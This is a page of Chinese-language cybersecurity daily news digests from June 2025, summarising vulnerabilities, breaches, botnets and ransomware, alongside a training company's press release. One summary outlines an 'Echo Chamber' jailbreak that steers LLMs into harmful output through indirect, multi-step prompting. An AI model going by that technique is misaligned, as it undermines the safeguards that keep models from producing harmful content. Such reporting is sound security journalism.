https://www.helpnetsecurity.com/2025/06/25/ai-platforms-data-sharing/ 主流AI平台如Meta、谷歌等收集并共享用户敏感数据,缺乏透明度和控制权,且无退出机制。企业商业机密也可能被泄露。隐私政策晦涩难懂,用户权益难以保障。 4、ELECOM路由器曝高危漏洞:命令注入与XSS风险 https://securityonline.info/critical-flaws-in-elecom-routers-jpcert-cc-issues-warning-over-command-injection-and-xss-risks/ ELECOM多款路由器曝高危漏洞,包括远程代码执行、命令注入和XSS,部分漏洞CVSS评分达9.8分。建议立即更新固件或停用受影响设备,临时措施包括修改密码和谨慎访问WebGUI。 5、2025年3月以来Prometei僵尸网络活动激增 https://securityaffairs.com/179303/cyber-crime/prometei-botnet-activity-has-surged-since-march-2025.html Prometei僵尸网络新型变种快速传播,针对Linux系统进行门罗币挖矿和凭证窃取,采用模块化架构和动态技术规避检测。最新版本支持多恶意活动,需通过YARA规则和持续监控防御。 6、NVIDIA Megatron-LM 存在双重注入风险 https://securityonline.info/double-injection-risk-in-nvidia-megatron-lm-code-execution-flaws-patched-in-v0-12-1/ NVIDIA披露其开源LLM框架Megatron-LM存在两个高危漏洞(CVE-2025-23264/23265),CVSS评分7.8,可导致远程代码执行和数据篡改。漏洞源于Python组件输入处理不当,影响0.12.0之前版本,已在0.12.1修复。企业AI应用需警惕此类框架安全风险。 7、Kaleris Navis N4终端操作系统曝出两个高危漏洞 https://securityonline.info/critical-kaleris-navis-n4-flaw-cve-2025-2566-cvss-9-8-supply-chain-infrastructure-at-risk/ Kaleris Navis N4终端操作系统曝出两个高危漏洞(CVE-2025-2566和CVE-2025-5087),其中9.8分漏洞可远程执行任意代码,5.9分漏洞泄露敏感信息。建议立即升级至4.0版本或采取防火墙、HTTPS等防护措施,供应链安全面临严重威胁。 8、配置不当的MCP服务器使AI代理系统面临入侵风险 https://www.freebuf.com/articles/ai-security/436479.html 数百台用于连接大语言模型(LLM)与第三方服务、数据源及工具的模型上下文协议(Model Context Protocol,MCP)服务器存在默认配置缺陷,可能导致用户面临未授权的操作系统命令执行等风险。 9、SAP GUI加密缺陷致敏感数据面临泄露风险 https://www.freebuf.com/articles/database/436410.html 全球数十万企业使用的SAP GUI界面被曝存在安全缺陷,其Windows(CVE-2025-0055)和Java(CVE-2025-0056)版本的用户输入历史记录功能采用过时加密或完全不加密的方式存储敏感数据。Pathlock研究员Jonathan Stross与Fortinet的Julian Petersohn发现,该系统本地存储的用户名、身份证号、银行账号等数据要么未加密,要么仅使用可重复利用的弱XOR密钥保护。 10、警惕微软Entra ID风险:访客账户存在隐蔽的权限提升策略 https://www.freebuf.com/articles/es/436405.html 微软Entra ID的订阅管理存在访问控制缺陷,允许访客用户在受邀租户中创建和转移订阅,同时保留对这些订阅的完全所有权。访客用户只需具备在源租户创建订阅的权限,以及受邀成为外部租户访客的身份即可实施此操作。这种隐蔽的权限提升策略使访客用户能够在仅应拥有有限访问权限的环境中获取特权立足点。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
喜讯!蚁景科技获评湖南省“专精特新”中小企业
近日,湖南省工业和信息化厅公示了 2025 年湖南省专精特新中小企业认定名单,湖南蚁景科技有限公司凭借在网络安全领域的卓越表现,成功入选。这一荣誉的获得,不仅是对蚁景科技专业化、精细化、特色化、新颖化发展的高度认可,也彰显了其在推动网络安全人才培养和行业发展中的重要作用。      近年来,国家高度重视 “专精特新” 企业的培育,将其作为提升产业竞争力、推动经济高质量发展的重要抓手。在此背景下,众多企业积极投身专业化发展道路,蚁景科技便是其中的杰出代表。此次获评湖南省专精特新中小企业,标志着蚁景科技在网络安全领域的技术实力和创新能力得到了权威肯定,也为其未来的发展奠定了坚实基础。  作为专业的 “网络安全人才培养服务提供商”,蚁景科技始终以配合国家网络安全人才培养战略为己任,精准对接行业人才市场需求。公司以提升网络安全实战能力为核心培养目标,深度剖析用人单位在网络安全岗位的技能要求,精心打造前沿、系统且专业的网络安全实战技能培训课程。无论是零基础的网络安全爱好者,还是希望提升专业技能的从业者,都能在蚁景科技的课程体系中找到适合自己的学习路径。  针对政企单位、科研院所等行业客户,蚁景科技充分发挥专业优势,量身定制网络安全培训方案。从基础的网络安全意识培训,到高级的攻防实战演练,蚁景科技都能根据客户的实际需求,提供个性化、全方位的培训服务,有效提升客户单位的网络安全防护水平。  在高校合作方面,蚁景科技紧密结合高校网络安全人才培养体系,凭借对 “互联网 + 教育” 的深刻理解,依托自主研发的网络安全人才实训平台 —— 蚁景网安实验室,构建了多样化的网络安全实验场景。该平台不仅能满足高校教师在线实验教学的需求,还为学生提供了沉浸式的网络安全实操环境,助力高校培养出更多理论与实践兼备的网络安全专业人才。目前,蚁景网安实验室已与全国多所高校建立合作关系,为高校网络安全教学改革和人才培养模式创新提供了有力支持。  未来,蚁景科技将矢志践行“专精特新”发展路径,坚守“赋能实战技能,筑牢网安根基”的核心使命。以专业师资和先进技术为引擎,持续深化网络安全人才培养模式创新,致力于构建更加完善、高效的网络安全实战教育生态体系。在数字化时代的浪潮中,蚁景科技将持续为行业输送高素质的网络安全人才,通过提供更先进、更系统的实战化培养方案,为国家网络安全事业发展贡献更大力量,助力企业和社会筑牢网络安全防线。
网络安全日报 2025年06月25日
1、Notepad++严重漏洞可致攻击者获取系统完全控制权 https://cybersecuritynews.com/notepad-vulnerability/ Notepad++ 8.8.1存在严重权限提升漏洞(CVE-2025-49144),攻击者可利用二进制植入获取SYSTEM权限,全球数百万用户面临系统被控风险。官方已发布8.8.2修复版本,建议立即更新。 2、新型"回音室"越狱技术可诱使OpenAI等大模型生成有害内容 https://thehackernews.com/2025/06/echo-chamber-jailbreak-tricks-llms-like.html 研究人员发现新型"回音室"越狱技术,通过间接引导和多步推理操控大语言模型内部状态,成功诱导其生成不当内容,攻击成功率超90%,暴露LLM安全防护盲区。 3、XDigo恶意软件利用Windows LNK漏洞攻击东欧政府机构 https://thehackernews.com/2025/06/xdigo-malware-exploits-windows-lnk-flaw.html 网络安全研究人员发现XDigo恶意软件利用Windows LNK漏洞攻击东欧政府机构,与XDSpy组织手法一致,通过特制LNK文件隐藏恶意命令,窃取数据并执行远程指令,目标包括白俄罗斯和俄罗斯关键部门。 4、pbkdf2关键密钥派生漏洞影响数百万JavaScript项目 https://securityonline.info/critical-key-derivation-flaws-in-pbkdf2-affect-millions-of-javascript-projects-poc-available/ 研究人员发现npm生态中广泛使用的pbkdf2密钥派生函数存在严重漏洞,影响数百万JavaScript项目,PoC已公开,威胁整个Web应用安全。 5、WinRAR高危漏洞允许通过恶意文件执行任意代码 https://cybersecuritynews.com/winrar-vulnerability/ WinRAR高危漏洞CVE-2025-6218允许攻击者通过恶意压缩文件执行任意代码,需用户交互触发。CVSS评分7.8,影响6月19日前所有版本。厂商已发布7.11版补丁,建议立即升级。 6、美国众议院禁止政府设备使用 WhatsApp https://securityonline.info/us-house-bans-whatsapp-on-government-devices-over-security-transparency-concerns/ 美国众议院禁止政府设备使用WhatsApp,指其数据保护不足且存在安全风险,推荐使用Teams等更安全应用。Meta反驳称WhatsApp采用端到端加密,安全标准更高。此举是美国加强数据安全、限制风险应用趋势的一部分。 7、WordPress热门汽车主题中的权限提升漏洞遭大规模利用 https://www.bleepingcomputer.com/news/security/wordpress-motors-theme-flaw-mass-exploited-to-hijack-admin-accounts/ 近期,安全公司Wordfence警告称,黑客正在大规模利用WordPress热门汽车主题“Motors”中的严重权限提升漏洞(CVE-2025-4322),非法篡改管理员密码,从而完全接管网站后台。该漏洞影响Motors 5.6.67及以前版本,其问题出在“Login Register”小组件的身份校验逻辑,可被攻击者通过精心构造的POST请求绕过验证,强制修改管 8、Aflac保险公司遭黑客攻击客户导致敏感数据被窃取 https://techcrunch.com/2025/06/23/us-insurance-giant-aflac-says-customers-personal-data-stolen-during-cyberattack/ 美国保险巨头Aflac近日在向美国证券交易委员会(SEC)提交的报告中披露,本月早些时候其网络遭到黑客入侵,导致客户社会安全号码、健康理赔信息等个人敏感数据被窃取。此次数据泄露事件还波及Aflac的受益人、员工与代理人,但公司尚未确认具体受影响人数。据Aflac介绍,该事件发生于6月12日,黑客通过社会工程手段渗透其内部系统,但未使用勒索软件。攻击者身份尚未完全确认 9、黑客绕过Gmail多因素认证发动定向攻击 https://www.malwarebytes.com/blog/news/2025/06/gmails-multi-factor-authentication-bypassed-by-hackers-to-pull-off-targeted-attacks 谷歌威胁情报小组(GTIG)近日披露,俄罗斯国家背景黑客通过社交工程手段绕过了Gmail的多因素认证(MFA),对特定目标实施了一系列精准攻击。攻击者假冒美国国务院官员,诱导受害者生成并分享“应用专用密码”,从而获取其Google账户的完全访问权限。所谓应用专用密码,是谷歌为不支持MFA验证的旧设备或程序提供的16位一次性登录密码,用 10、McLaren医疗集团遭勒索软件攻击导致超74万人信息泄露 https://www.govinfosecurity.com/mclaren-health-says-743000-affected-by-2024-ransomware-hack-a-28785 美国密歇根州的McLaren医疗集团近日披露,该机构于2024年夏天遭遇国际勒索软件组织“Inc. Ransom”攻击,导致743000余人个人信息被窃取,这是McLaren两年内第二次遭遇重大勒索攻击。攻击发生于2024年7月17日至8月3日之间,受影响的不仅包括McLaren的医院系统,也涉及其旗下的Karmanos癌症中心。攻击者不仅入侵并加密了IT系统,还宣称成功窃取敏感数据。此次事件导 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月24日
1、攻击者利用Clickfix技术部署NodeInitRAT远控木马 https://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/ 2025年初,Red Canary揭示了一种新型网络威胁“Mocha Manakin”,其利用“粘贴并运行”(Paste and Run)手法,成功诱导用户执行恶意PowerShell脚本,从而植入定制的NodeJS远控木马NodeInitRAT。该攻击方式在伪装为文档修复或人机验证界面(又称Clickfix或fakeCAPTCHA)时,诱导用户复制并粘贴命令,绕过安全机制直接在系统中执行恶意指令。NodeInitRAT具备持续驻留、权限 2、Anubis勒索软件将巴黎迪士尼乐园列为新受害者 https://hackread.com/anubis-ransomware-lists-disneyland-paris-new-victim/ 勒索软件团伙Anubis近日在其暗网泄露网站上宣称,成功入侵巴黎迪士尼系统,窃取了约64GB的敏感数据。此次事件被该组织称为“迪士尼乐园史上最大规模的数据泄露”,目前尚未获得官方证实。泄露内容据称包括涉及多个游乐设施建设与翻新项目的39000个工程文件,涉及项目包括冰雪奇缘、加勒比海盗、雷霆山、巴斯光年、幻想世界等。据Anubis表示,此次数据并非直接来自迪士尼,而是通过攻击其合作方系统而获取。该团伙还已在暗网上公布了部分文件、图纸和视频资料,以 3、研究人员披露LangSmith平台漏洞可能导致用户数据泄露 https://www.govinfosecurity.com/malicious-ai-agent-in-langsmith-may-have-exposed-api-data-a-28769 安全研究人员披露,开源AI开发平台LangSmith存在一个严重漏洞,攻击者可借助该平台的Prompt Hub向公众发布携带恶意代理配置的AI代理,进而窃取用户的OpenAI API密钥、提示词、上传文档、图像及语音输入等敏感数据。该漏洞被命名为“AgentSmith”,CVSS评分为8.8,现已由LangSmith官方修复。LangSmith作为LangChain生态的一部分,被广泛应用于大语言模 4、牛津市议会遭遇网络攻击泄露了二十年的数据 https://www.bleepingcomputer.com/news/security/oxford-city-council-suffers-breach-exposing-two-decades-of-data/ 英国牛津市议会近日披露,因一起网络安全事件导致其部分历史系统被非法访问,涉及时间跨度达20年的敏感信息外泄。初步调查显示,受影响数据涉及2001年至2022年间在选举工作中担任过角色的人员,如投票站工作人员与计票员的个人信息。事件还造成市议会信息与通信技术服务中断,虽多数系统已恢复运行,但仍存在部分积压问题,可能影响服务进度。市议会在声明中指出,目前尚无证据表明公民信息被 5、伊朗证实关闭互联网是为了保护国家免受网络攻击 https://securityaffairs.com/179199/cyber-warfare-2/iran-confirmed-it-shut-down-internet-to-protect-the-country-against-cyberattacks.html 在与以色列冲突持续升级之际,伊朗政府首次证实,其于本周实施全国范围的网络中断,旨在应对来自以色列的持续网络攻击威胁。此前,伊朗多个关键基础设施遭受网络攻击,包括国有银行和加密货币交易平台,引发政府出于“国家安全”理由采取断网措施。伊朗政府发言人莫哈杰拉尼在电视采访中表示,当前局势下,许多敌方无人机依靠互联网进行操控,同时网 6、微软宣布清除Windows Update旧驱动以提升系统安全 https://www.bleepingcomputer.com/news/microsoft/microsoft-to-remove-legacy-drivers-from-windows-update-for-security-boost/ 微软近日宣布,将定期从Windows Update中移除旧版驱动程序,以降低安全和兼容性风险,优化系统稳定性。官方表示,此举旨在维护Windows生态中硬件设备驱动的质量,同时强化整体安全防护能力。此次清除计划的首个阶段将聚焦于那些已有更新替代版本的旧驱动,相关驱动将在Windows硬件开发中心(Hardware Development Center 7、逾10万个WordPress网站因MCP AI引擎漏洞面临提权攻击风险 https://www.freebuf.com/articles/web/435674.html WordPress生态系统近日曝出高危安全漏洞,通过AI Engine插件的模型上下文协议(Model Context Protocol,MCP)实现,导致超过10万个网站面临权限提升攻击风险。该漏洞编号为CVE-2025-5071,CVSS评分高达8.8分,影响AI Engine插件2.8.0至2.8.3版本,攻击者仅需具备订阅者(subscriber)级别的低权限账户,即可获取目标WordPress网站的完整管理控制权。 8、Prometei僵尸网络攻击Linux服务器进行加密货币挖矿 https://cybersecuritynews.com/prometei-botnet-attacking-linux-servers/ Prometei僵尸网络近期活跃,针对Linux服务器进行门罗币挖矿和凭证窃取,采用多向量攻击和高级规避技术,威胁全球企业基础设施。 9、教父安卓木马利用虚拟化技术劫持银行与加密货币应用 https://www.freebuf.com/articles/435794.html 移动安全公司Zimperium警告称,教父(GodFather)安卓木马通过设备端虚拟化技术劫持真实银行与加密货币应用,窃取用户资金。该恶意软件不再使用虚假覆盖层,而是在受害者设备上创建沙箱环境运行真实应用,并实时截获用户输入。 10、Python标准库tarfile模块存在任意文件写入高危漏洞 https://www.freebuf.com/articles/system/435877.html 安全研究人员发现Python标准库中的tarfile模块存在高危漏洞(CVE-2025-4517,CVSS评分9.4)。该漏洞允许攻击者通过特制的tar压缩包实现任意文件写入(Arbitrary File Write),目前概念验证代码(PoC)已在技术社区流传。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页